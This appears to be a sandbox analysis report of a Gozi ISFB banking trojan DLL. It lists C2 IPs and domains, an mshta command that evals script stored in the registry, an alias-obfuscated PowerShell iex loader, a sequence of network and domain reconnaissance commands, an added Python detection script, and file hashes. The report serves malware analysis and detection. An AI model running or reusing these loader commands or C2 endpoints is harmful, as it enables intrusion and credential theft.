Analysis

  • max time kernel
    150s
  • max time network
    125s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220721-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20220721-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    03-08-2022 16:03

General

  • Target

    de00c4750accf516704b8c0df265c24a.dll

  • Size

    300KB

  • MD5

    de00c4750accf516704b8c0df265c24a

  • SHA1

    eddbc6019ec7ba82d3c5b4c59efe797ff1df9f75

  • SHA256

    7dae6d6fb339b6114ffdd3c0b6bcaa2c9dab0a73979fec029801e9e16d7d06bc

  • SHA512

    b0e6bbbdae36bd81f63dbab9296515d3a389fa6acb397476058ae202e66026ca8dc523fb35c6b7145a87d6e61e3833e396873e61e733152ccbaa39387bada96f

Malware Config

Extracted

Family

gozi_ifsb

Botnet

3000

C2

config.edge.skype.com

37.120.206.71

37.120.206.84

193.106.191.163

The first entry, config.edge.skype.com, is a legitimate Microsoft domain that Gozi ISFB configurations routinely carry alongside the real controllers; do not treat it as an indicator on its own. The three IP addresses are the actionable C2 entries for this loader config.

Attributes
  • base_path

    /drew/

  • build

    250240

  • exe_type

    loader

  • extension

    .jlk

  • server_id

    50

rsa_pubkey.plain
aes.plain

Extracted

Family

gozi_ifsb

Botnet

3000

C2

37.120.206.91

37.120.206.95

havefuntxmm.at

5.42.199.57

xerkdeoleone.at

Attributes
  • base_path

    /images/

  • build

    250240

  • exe_type

    worker

  • extension

    .jlk

  • server_id

    50

rsa_pubkey.plain
aes.plain

Signatures

  • Gozi, Gozi ISFB

    Gozi ISFB is a well-known and widely distributed banking trojan.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Suspicious use of SetThreadContext 6 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). The sandbox's generic description for this signature says "likely ransomware behaviour", but nothing in this run supports that: no file encryption is recorded, and the sample is a Gozi ISFB loader, so read it as drive/environment enumeration.

  • Discovers systems in the same network 1 TTPs 3 IoCs
  • Enumerates processes with tasklist 1 TTPs 1 IoCs
  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Modifies registry class 64 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 51 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\System32\RuntimeBroker.exe
    C:\Windows\System32\RuntimeBroker.exe -Embedding
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:3448
  • C:\Windows\system32\regsvr32.exe
    regsvr32 /s C:\Users\Admin\AppData\Local\Temp\de00c4750accf516704b8c0df265c24a.dll
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:844
    • C:\Windows\SysWOW64\regsvr32.exe
      /s C:\Users\Admin\AppData\Local\Temp\de00c4750accf516704b8c0df265c24a.dll
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      PID:1816
  • C:\Windows\System32\RuntimeBroker.exe
    C:\Windows\System32\RuntimeBroker.exe -Embedding
    1⤵
    PID:4104
  • C:\Windows\System32\RuntimeBroker.exe
    C:\Windows\System32\RuntimeBroker.exe -Embedding
    1⤵
    PID:3720
  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3020
    • C:\Windows\System32\mshta.exe
      "C:\Windows\System32\mshta.exe" "about:<hta:application><script>Shab='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Shab).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\53818B71-9696-FD5C-3837-2A81EC5BFE45\\\SystemText'));if(!window.flag)close()</script>"
      2⤵
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:4424
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name nttbepxbbx -value gp; new-alias -name apawnvggm -value iex; apawnvggm ([System.Text.Encoding]::ASCII.GetString((nttbepxbbx "HKCU:Software\AppDataLow\Software\Microsoft\53818B71-9696-FD5C-3837-2A81EC5BFE45").StopName))
        3⤵
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3932
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ah5igeoc\ah5igeoc.cmdline"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:516
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1F40.tmp" "c:\Users\Admin\AppData\Local\Temp\ah5igeoc\CSC24D500C657934025B3BFB861A4C63B85.TMP"
            5⤵
            PID:2720
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jfroacpp\jfroacpp.cmdline"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:696
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1FDC.tmp" "c:\Users\Admin\AppData\Local\Temp\jfroacpp\CSC9430E91D549343849319CE1EE7C3E4DD.TMP"
            5⤵
            PID:1932
    • C:\Windows\syswow64\cmd.exe
      "C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
      2⤵
      PID:2616
    • C:\Windows\system32\cmd.exe
      cmd /C "wmic computersystem get domain |more > C:\Users\Admin\AppData\Local\Temp\6602.bin1"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1860
      • C:\Windows\System32\Wbem\WMIC.exe
        wmic computersystem get domain
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:3656
      • C:\Windows\system32\more.com
        more
        3⤵
        PID:1344
    • C:\Windows\system32\cmd.exe
      cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"
      2⤵
      PID:5028
    • C:\Windows\system32\cmd.exe
      cmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\6602.bin1"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2876
      • C:\Windows\system32\systeminfo.exe
        systeminfo.exe
        3⤵
        • Gathers system information
        PID:4020
    • C:\Windows\system32\cmd.exe
      cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"
      2⤵
      PID:3936
    • C:\Windows\system32\cmd.exe
      cmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4668
      • C:\Windows\system32\net.exe
        net view
        3⤵
        • Discovers systems in the same network
        PID:1160
    • C:\Windows\system32\cmd.exe
      cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"
      2⤵
      PID:4240
    • C:\Windows\system32\cmd.exe
      cmd /C "nslookup 127.0.0.1 >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4452
      • C:\Windows\system32\nslookup.exe
        nslookup 127.0.0.1
        3⤵
        PID:4388
    • C:\Windows\system32\cmd.exe
      cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"
      2⤵
      PID:4448
    • C:\Windows\system32\cmd.exe
      cmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"
      2⤵
      PID:2232
      • C:\Windows\system32\tasklist.exe
        tasklist.exe /SVC
        3⤵
        • Enumerates processes with tasklist
        • Suspicious use of AdjustPrivilegeToken
        PID:3144
    • C:\Windows\system32\cmd.exe
      cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"
      2⤵
      PID:2728
    • C:\Windows\system32\cmd.exe
      cmd /C "driverquery.exe >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"
      2⤵
      PID:3576
      • C:\Windows\system32\driverquery.exe
        driverquery.exe
        3⤵
        PID:3936
    • C:\Windows\system32\cmd.exe
      cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"
      2⤵
      PID:4472
    • C:\Windows\system32\cmd.exe
      cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"
      2⤵
      PID:3484
      • C:\Windows\system32\reg.exe
        reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s
        3⤵
        PID:4616
    • C:\Windows\system32\cmd.exe
      cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"
      2⤵
      PID:2256
    • C:\Windows\system32\cmd.exe
      cmd /C "net config workstation >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"
      2⤵
      PID:3516
      • C:\Windows\system32\net.exe
        net config workstation
        3⤵
        PID:1152
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 config workstation
          4⤵
          PID:4456
    • C:\Windows\system32\cmd.exe
      cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"
      2⤵
      PID:2400
    • C:\Windows\system32\cmd.exe
      cmd /C "nltest /domain_trusts >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"
      2⤵
      PID:1976
      • C:\Windows\system32\nltest.exe
        nltest /domain_trusts
        3⤵
        PID:2588
    • C:\Windows\system32\cmd.exe
      cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"
      2⤵
      PID:4276
    • C:\Windows\system32\cmd.exe
      cmd /C "nltest /domain_trusts /all_trusts >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"
      2⤵
      PID:4912
      • C:\Windows\system32\nltest.exe
        nltest /domain_trusts /all_trusts
        3⤵
        PID:5012
    • C:\Windows\system32\cmd.exe
      cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"
      2⤵
      PID:844
    • C:\Windows\system32\cmd.exe
      cmd /C "net view /all /domain >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"
      2⤵
      PID:920
      • C:\Windows\system32\net.exe
        net view /all /domain
        3⤵
        • Discovers systems in the same network
        PID:4036
    • C:\Windows\system32\cmd.exe
      cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"
      2⤵
      PID:1092
    • C:\Windows\system32\cmd.exe
      cmd /C "net view /all >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"
      2⤵
      PID:2528
      • C:\Windows\system32\net.exe
        net view /all
        3⤵
        • Discovers systems in the same network
        PID:4892
    • C:\Windows\system32\cmd.exe
      cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"
      2⤵
      PID:5088
    • C:\Windows\system32\cmd.exe
      cmd /U /C "type C:\Users\Admin\AppData\Local\Temp\6602.bin1 > C:\Users\Admin\AppData\Local\Temp\6602.bin & del C:\Users\Admin\AppData\Local\Temp\6602.bin1"
      2⤵
      PID:1980
  • C:\Windows\System32\RuntimeBroker.exe
    C:\Windows\System32\RuntimeBroker.exe -Embedding
    1⤵
    • Modifies registry class
    PID:536
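
The tree above is the full Gozi ISFB chain on one host: regsvr32 loads the DLL, Explorer.EXE then spawns mshta, which eval()s an HTA stored under HKCU\Software\AppDataLow\Software\Microsoft\<GUID>, PowerShell pulls the next stage from the same key through freshly created aliases for gp and iex, and a burst of cmd /C children appends one recon tool after another to a single %TEMP% file. Those three stages are what a detection should key on, rather than any single binary name. The following Python is an added example, not part of this report and not any vendor's rule set; it assumes process-creation events as plain dicts (pid, parent_pid, image, command_line are this example's own field names) and is exercised on command lines copied from the tree above plus one constructed benign event as a negative control.

```python
"""Detection logic for the Gozi ISFB execution chain recorded in this report.

Added example, not part of the sandbox report.  Assumptions: process-creation
events are dicts with pid, parent_pid, image and command_line (field names are
this example's own); SAMPLE_EVENTS copies command lines from the report's
process tree and adds one constructed benign event as a negative control.
"""
import re
from collections import defaultdict

# Stage 1: mshta runs an inline HTA from an "about:" URL that eval()s script
# read back from HKCU\Software\AppDataLow\Software\Microsoft\<GUID>.
MSHTA_INLINE_HTA = re.compile(r"about:<hta:application>", re.I)
REGREAD_APPDATALOW = re.compile(r"regread\(.*AppDataLow\\+Software\\+Microsoft", re.I)

# Stage 2: powershell reads a value under the same GUID key and feeds it to
# iex, with gp/iex hidden behind freshly created aliases.
PS_APPDATALOW_KEY = re.compile(
    r"HKCU:\\?Software\\AppDataLow\\Software\\Microsoft\\[0-9A-Fa-f-]{36}")
PS_ALIAS_IEX = re.compile(r"new-alias\s+-name\s+\S+\s+-value\s+iex\b", re.I)

# Stage 3: a burst of cmd /C "<recon tool> >> <one temp file>" children of the
# same parent; matched per tool, then counted per (parent, output file).
RECON_TOOL = re.compile(
    r"\b(systeminfo|net view|nslookup|tasklist|driverquery|reg(?:\.exe)? query|"
    r"net config|nltest|wmic)\b", re.I)
REDIRECT_TARGET = re.compile(r'>>?\s*([A-Za-z]:\\[^\s"&|]+)')


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def classify_event(ev):
    """Labels for the fileless stages that can be judged from a single event."""
    cmd, hits = ev["command_line"], []
    if basename(ev["image"]) == "mshta.exe" and MSHTA_INLINE_HTA.search(cmd) \
            and REGREAD_APPDATALOW.search(cmd):
        hits.append("gozi_mshta_registry_loader")
    if basename(ev["image"]) == "powershell.exe" and PS_APPDATALOW_KEY.search(cmd) \
            and PS_ALIAS_IEX.search(cmd):
        hits.append("gozi_powershell_registry_stage")
    return hits


def find_recon_bursts(events, min_tools=5):
    """Map (parent_pid, output file) -> sorted distinct recon tools redirected
    into that file.  Only groups with at least min_tools tools are returned, so
    a lone 'systeminfo > report.txt' typed by an admin does not fire."""
    groups = defaultdict(set)
    for ev in events:
        if basename(ev["image"]) != "cmd.exe":
            continue
        target = REDIRECT_TARGET.search(ev["command_line"])
        tool = RECON_TOOL.search(ev["command_line"])
        if target and tool:
            name = re.sub(r"\.exe", "", tool.group(1).lower())
            groups[(ev["parent_pid"], target.group(1).lower())].add(name)
    return {k: sorted(v) for k, v in groups.items() if len(v) >= min_tools}


def scan(events):
    stage_hits = [(ev["pid"], label) for ev in events for label in classify_event(ev)]
    return {"stage_hits": stage_hits, "recon_bursts": find_recon_bursts(events)}


T = r"C:\Users\Admin\AppData\Local\Temp\6602.bin1"   # output file from the report


def _ev(pid, parent, image, cmdline):
    return {"pid": pid, "parent_pid": parent, "image": image, "command_line": cmdline}


SAMPLE_EVENTS = [
    # command lines copied from the report's process tree
    _ev(4424, 3020, r"C:\Windows\System32\mshta.exe",
        r'''"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Shab='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Shab).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\53818B71-9696-FD5C-3837-2A81EC5BFE45\\\SystemText'));if(!window.flag)close()</script>"'''),
    _ev(3932, 4424, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name nttbepxbbx -value gp; new-alias -name apawnvggm -value iex; apawnvggm ([System.Text.Encoding]::ASCII.GetString((nttbepxbbx "HKCU:Software\AppDataLow\Software\Microsoft\53818B71-9696-FD5C-3837-2A81EC5BFE45").StopName))'),
    _ev(1860, 3020, r"C:\Windows\system32\cmd.exe", f'cmd /C "wmic computersystem get domain |more > {T}"'),
    _ev(5028, 3020, r"C:\Windows\system32\cmd.exe", f'cmd /C "echo -------- >> {T}"'),
    _ev(2876, 3020, r"C:\Windows\system32\cmd.exe", f'cmd /C "systeminfo.exe > {T}"'),
    _ev(4668, 3020, r"C:\Windows\system32\cmd.exe", f'cmd /C "net view >> {T}"'),
    _ev(2232, 3020, r"C:\Windows\system32\cmd.exe", f'cmd /C "tasklist.exe /SVC >> {T}"'),
    _ev(3484, 3020, r"C:\Windows\system32\cmd.exe",
        f'cmd /C "reg.exe query "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall" /s >> {T}"'),
    _ev(3516, 3020, r"C:\Windows\system32\cmd.exe", f'cmd /C "net config workstation >> {T}"'),
    _ev(1976, 3020, r"C:\Windows\system32\cmd.exe", f'cmd /C "nltest /domain_trusts >> {T}"'),
    _ev(1980, 3020, r"C:\Windows\system32\cmd.exe", f'cmd /U /C "type {T} > {T[:-1]} & del {T}"'),
    # constructed negative control: an admin saving one report by hand
    _ev(7000, 1234, r"C:\Windows\system32\cmd.exe", r'cmd /C "systeminfo > C:\Users\Admin\Desktop\inventory.txt"'),
]

if __name__ == "__main__":
    for k, v in scan(SAMPLE_EVENTS).items():
        print(k, v)
```

The stage checks are deliberately narrow (inline HTA plus regread of the AppDataLow key; alias-wrapped iex plus the same key) so they survive the randomised alias and value names this family rotates; the recon check is deliberately wide and relies on the count of distinct tools funnelled into one file by one parent, which is the part an operator cannot cheaply randomise.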

Downloads

  • C:\Users\Admin\AppData\Local\Temp\6602.bin

    Filesize: 65KB
    MD5: a345edcdee52303ac713c76b2366a94c
    SHA1: 4452c95702106a78f24f701612788561e04c6407
    SHA256: 4de5d19e13c2eab729c6a8ec04deeda952c11bb9651560a75248f46da86f9f2d
    SHA512: 3286dbb2a3619004b3ed58442cef3bb89db0ab2ab98627674e37db503de1b7c8f2147c99e44ebb8b98a7f6f13ef13b6dd501993b7a0dd0d579e01023b971695a

  • C:\Users\Admin\AppData\Local\Temp\6602.bin1

    Filesize: 44B
    MD5: f7aea2435aa888b709ca20f816c33bfd
    SHA1: 38717c9a73b5f8bd399839cbe0aa57518427e758
    SHA256: f0c30a157e0a0ea84b114c2b66a66d444a3824c2bfe7829d929b40e6548fa5d5
    SHA512: 1ea828fc1932c97f5ba5f6ebf05f2816d4d89f003b094f2d0868d54f52b53774437037e2c8837e97b820d5f2e5d5707825b048a9ab2af261af00810f01bd8232

  • C:\Users\Admin\AppData\Local\Temp\6602.bin1

    Filesize: not given; the hashes below are those of empty input, i.e. a zero-byte snapshot. This is consistent with the single ">" in the "systeminfo.exe > ...6602.bin1" step truncating the file (discarding the 44B "wmic computersystem get domain" output captured above) before systeminfo wrote anything.
    MD5: d41d8cd98f00b204e9800998ecf8427e
    SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
    SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
    SHA512: cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

  • C:\Users\Admin\AppData\Local\Temp\6602.bin1

    Filesize: 2KB
    MD5: 42bfa4737502d07aa54f4c8ee04c5fef
    SHA1: 7198ae79a9c046de5d684acfd132b37f00f6a425
    SHA256: 3ab1b367877d3869cf3c6996a677d215ada1f76719a788bd23f622dd311d3d36
    SHA512: 5f8500e06373e66eb5fa954aafb5cbad214994442d67e8d2f21032f350b2d8e6fe7a79083322fb8383deece1678c32cde030e226e12346cd604366351ad74c1d

  • C:\Users\Admin\AppData\Local\Temp\6602.bin1

    Filesize: 2KB
    MD5: f2ea599a2b3969ca84eef5bfcb3872f5
    SHA1: ea8db863a41c24696622269c1e9a59470d81d5ae
    SHA256: f4afef97443809ed08b7b279fb70ddef9e3e2ae96dbf0f0f8878d342c53ee765
    SHA512: 6d18d72d27153253d36c2943d01ec09fded565afb6d6094c4a7062132ad60c4ad58ccbfc035644784ed338d543325f2e3062138cafebd4e4b6281f346a03d183

  • C:\Users\Admin\AppData\Local\Temp\6602.bin1

    Filesize: 2KB
    MD5: 550324b3d2c3fccbf11991e605fb633a
    SHA1: 0e72da4bfa6e52f9b5627a825038f85135dc341a
    SHA256: bc7180b72043de2e008063fcc5f952b964d9c9530ad2aab4752aec84095df3a1
    SHA512: 49883798521b722a2f40217ae8c96d960c6ccf31854d4b9008ce86700a67667e0168a798e1fb933e118fde9de890f40fc9ede8617356b7bd58b8ab1a46cc0f20

  • C:\Users\Admin\AppData\Local\Temp\6602.bin1

    Filesize: 9KB
    MD5: 94b550334ec2b1b98472ead5fce8f180
    SHA1: d2f658d2e49fcdc6c43b91e1dc712922f6412945
    SHA256: 95a7fe2794be40bd2ac401f1b64b163db7c497887cc7833c59191e69cb8a4ca1
    SHA512: 004cfcdf654e8160192b9181586c0ed1493c8638b77cf718f3e5419054b95db288412d98abdbfde6720e283548ad1ab3a172ad3ea33cb9f796c212e928c1d979

  • C:\Users\Admin\AppData\Local\Temp\6602.bin1

    Filesize: 35KB
    MD5: de21ae01f00b8ae78b2d39e2055d1dc0
    SHA1: 397a864a9dc4f574820996dc4d32a37659d0b531
    SHA256: d369bd389a25236dfcc4910b99a40c0aab815e3544745230dcabef3beab75937
    SHA512: d03ae00a7b999682ebfe93858349b01fc95b22910e48958d71aa019ea6d1aa7deb9bd0042c59e2ad07a4d1a454d6969cf86d53be557b93a3871d8c7437a61816

  • C:\Users\Admin\AppData\Local\Temp\6602.bin1

    Filesize: 64KB
    MD5: 397eb325e338a7924c540b5bcd94e374
    SHA1: f88da33ae78e5fd848531e462da24a9a7c57de88
    SHA256: 6cbecfa984f5200f16101f26d5e2c21290cfecc9a4621f880cff2e2392b3870c
    SHA512: f20765df381088b9e293dac8736d1475f90c6a732e7e148afadf69aa862f3f7c414a2a0b02d58555b43fe71cc4d28f737648ea97d0ee18395d472ffd4ab30a1e

• C:\Users\Admin\AppData\Local\Temp\6602.bin1
  Filesize: 65KB
  MD5: f1a2aa1f4f0c2e950ca2e946f24e52a7
  SHA1: 5a6aa89b4cd8a10c7e968b3d357e8b438c7533d0
  SHA256: 1fc846218d715bb746962b8978905a7b9f8c559c56ca1ca0d558dfba721d67ed
  SHA512: 54a2825defb8e69afdb4f23cacb80b3ac881a981566dee1eba4d6c916927ef7e74f83ac71959f829da710c540858f183beeef162dcb95ad992249b4732de810f

• C:\Users\Admin\AppData\Local\Temp\6602.bin1
  Filesize: 65KB
  MD5: 9bae8ae2e7f60de0d8c3f9809a365b5a
  SHA1: c05309024e67723dbc40583390d9deb970208a30
  SHA256: 9ef11a026250169cb0eca6369809bee07b0f24c5c1933938c25f4f84eb5d0abb
  SHA512: 0a55a13b234f55851cfe4b49d8cbf24c50db3805aeb00a3ca8004824c045fb0a3619e8a038b849f953672e2092a3e43bc945e7902458fb0b580f41cdaeddfc0a

• C:\Users\Admin\AppData\Local\Temp\6602.bin1
  Filesize: 65KB
  MD5: 24e087934651d6f0a5885fa46f185864
  SHA1: b20946bd3d31fcd75bc758c8e659de9dafaf20eb
  SHA256: b1626a5b8040ba8fbc5f15bdbde39f8e25177873df1fd2865db6949bc263af02
  SHA512: f98260eb89115d6f26e03a6d866bd6bebcfb6a02dd69814f9a15e617670527556f8e7fdbc9f72ab323585169b28783a95982b929722294812ef0e4fa91ded06e

• C:\Users\Admin\AppData\Local\Temp\6602.bin1
  Filesize: 65KB
  MD5: eb94ae3ce4b86bff9cafe1503fbc001d
  SHA1: 0bc3aee0a38c82f1e6775b1428219e7460e38ace
  SHA256: b037abcec90bc47921db5c251215e9cb135511d0b08ce395fd697b88d1e99f6b
  SHA512: 922243683bad6ef9ccb80fff75c8ff44673acd5c8f52e693c66e3e35589a12bd5ee24d875dea2759d6912a2159aa1d7086e765dd488bfef11eb531c9fe863aa2

• C:\Users\Admin\AppData\Local\Temp\6602.bin1
  Filesize: 65KB
  MD5: a345edcdee52303ac713c76b2366a94c
  SHA1: 4452c95702106a78f24f701612788561e04c6407
  SHA256: 4de5d19e13c2eab729c6a8ec04deeda952c11bb9651560a75248f46da86f9f2d
  SHA512: 3286dbb2a3619004b3ed58442cef3bb89db0ab2ab98627674e37db503de1b7c8f2147c99e44ebb8b98a7f6f13ef13b6dd501993b7a0dd0d579e01023b971695a

• C:\Users\Admin\AppData\Local\Temp\RES1F40.tmp
  Filesize: 1KB
  MD5: a9eead4a76288738990c8668032dd780
  SHA1: ece0771b0b40abec808cd5e8dedfbebbd4345d68
  SHA256: 925c00351b791b62cd80c6d7dab5f276374ae454146317405984eabd303746dc
  SHA512: b2ccc1ee6d4eb958098ea279c27093836ccc6a7e2148602fcb5ee2dbc457c169f30179047ab206a85ba66cf696edb6005f0819558a00e372c36458d37b5fa4bb

• C:\Users\Admin\AppData\Local\Temp\RES1FDC.tmp
  Filesize: 1KB
  MD5: 860be3be01f3f3c1bb8223c4b4ebf8d5
  SHA1: 98662fcdbf155d942f6aec76e367f0fef5cb1f21
  SHA256: 51f4a4c2de2bb96c36d8e1fc4226bf530d8c3d90347ce8c4244964c1b835ba54
  SHA512: 63f3f394d791aae4dd154109e21dc6d6b21cad707296fbc7ac1c6179febdf17d6313d9b2ef85a8be66aea79f47e983a08af2c551eb4c94a765393a7ce450ba8b

• C:\Users\Admin\AppData\Local\Temp\ah5igeoc\ah5igeoc.dll
  Filesize: 3KB
  MD5: 8495c9cbe1593820014899a043577e1b
  SHA1: b395a19a3262dc61ea9f3174cad05e194fcbbe57
  SHA256: 08496276bf461cb5696ddbde59bf09077bf8809e27c9e4b4e74d8d59409996c8
  SHA512: 035d7f718a2d50e578b2c1464ddd1fb91a7ef4b656ff9bbd2af4adcdf44b839ce7c759c524ba02fffab3b09aef704a36eba7a0429e3836c7a5c3f0c207bc9715

• C:\Users\Admin\AppData\Local\Temp\jfroacpp\jfroacpp.dll
  Filesize: 3KB
  MD5: ea0f2464b104a78625ed3074b10d5b26
  SHA1: 871ebae4ea06340b952d4671f6cf79013808bf22
  SHA256: 4823aab825570b456b0ded382a952b148c6fd24127143f214d93e8a9fe8c8506
  SHA512: 82fdfcef702db4bec115d91411e67512a332a7113150fabfcae74f71e9e7090a489f6ebfccaa5e3b28c3c934ce089973e3d07338a47f6d67f2f72f0b998b2f10

• \??\c:\Users\Admin\AppData\Local\Temp\ah5igeoc\CSC24D500C657934025B3BFB861A4C63B85.TMP
  Filesize: 652B
  MD5: e250c595c30addb02ffc6984e63a7380
  SHA1: b44e41b7d62b61f9b04eed3e311910f34a0ebedb
  SHA256: 15f35b53c4861185a583a1dbcb3222d7ac9654681b0dbc2fe031d59757baa063
  SHA512: 8abf7fe5b21c2a61c01c7eefcc996d2e7068d245aba9071c7db224abbd32b16610efafca56171728d2da0ebcbeb98116847bdaa8071c2111e8686700f96abfd6

• \??\c:\Users\Admin\AppData\Local\Temp\ah5igeoc\ah5igeoc.0.cs
  Filesize: 410B
  MD5: 9a10482acb9e6952b96f4efc24d9d783
  SHA1: 5cfc9bf668351df25fcda98c3c2d0bb056c026c3
  SHA256: a0424e1530f002761a882c19c22504153a5e86d7fbb41391e940452bfa15f377
  SHA512: e932914ad99d7bd39561e020d1e8c1f4e175c16eae66df720100c65e40ccc3383b5145f703432885f3f1ce080e8a4feb045ddd5c8bbc2f3231c619d04182ac28

• \??\c:\Users\Admin\AppData\Local\Temp\ah5igeoc\ah5igeoc.cmdline
  Filesize: 369B
  MD5: f2734214002408a7eccd2fbae5870da5
  SHA1: fde6d5c4e61dff27f46f69c480155e1101397700
  SHA256: 552cfb233eff0461a558e7e25cea4e6b720ce96953fa1ee5d231c4ae67fdf102
  SHA512: 3e2cfa712aba0bc2ba463e9543e6270f49134533b10aa4b851d5e4aec97c2daec663f484b412715fb3df6496617c97974812fef5edf569a9784377859b3c56b5

• \??\c:\Users\Admin\AppData\Local\Temp\jfroacpp\CSC9430E91D549343849319CE1EE7C3E4DD.TMP
  Filesize: 652B
  MD5: 83ab673e353bc97b876da6cfc8b171d8
  SHA1: 4a661313af68b943f2580cdbcf76b19a89e12734
  SHA256: 2a0cbd619f15e2cc9a716556eed90f2e8f130999317d327fa1d96744309e450e
  SHA512: a17c1dfffaa789762e8ec8146d1d0c1136f5a706d2c3387965cbb4bf58b35cb7db764164d263ce371cbc4dd39d3a4fad8b18928caaf73307c696e74bfd722f93

• \??\c:\Users\Admin\AppData\Local\Temp\jfroacpp\jfroacpp.0.cs
  Filesize: 400B
  MD5: aca9704199c51fde14b8bf8165bc2a4c
  SHA1: 789b408ccad29240bd093515cbd19a199ad2c1c8
  SHA256: cb3da8a9768252634f8ed4c62e026dc8217b055e00f11b6012a52ed130c92c27
  SHA512: a8c1df598581f508ecbf1e516744f11abfb71ec6bb9895d0b61f15e70e56e27cb40b4e5395b9411b787f8bb4f264ca704d815260677909dc1e599d601d0b5de6

• \??\c:\Users\Admin\AppData\Local\Temp\jfroacpp\jfroacpp.cmdline
  Filesize: 369B
  MD5: 340f65806e42a1b022861685812d236b
  SHA1: a53ffde123a1837fe255d764e7a992ab905fb8b9
  SHA256: b75d827e0d31904c9782c6ed7f767265477310971a1f4335efc140f0f074ceb7
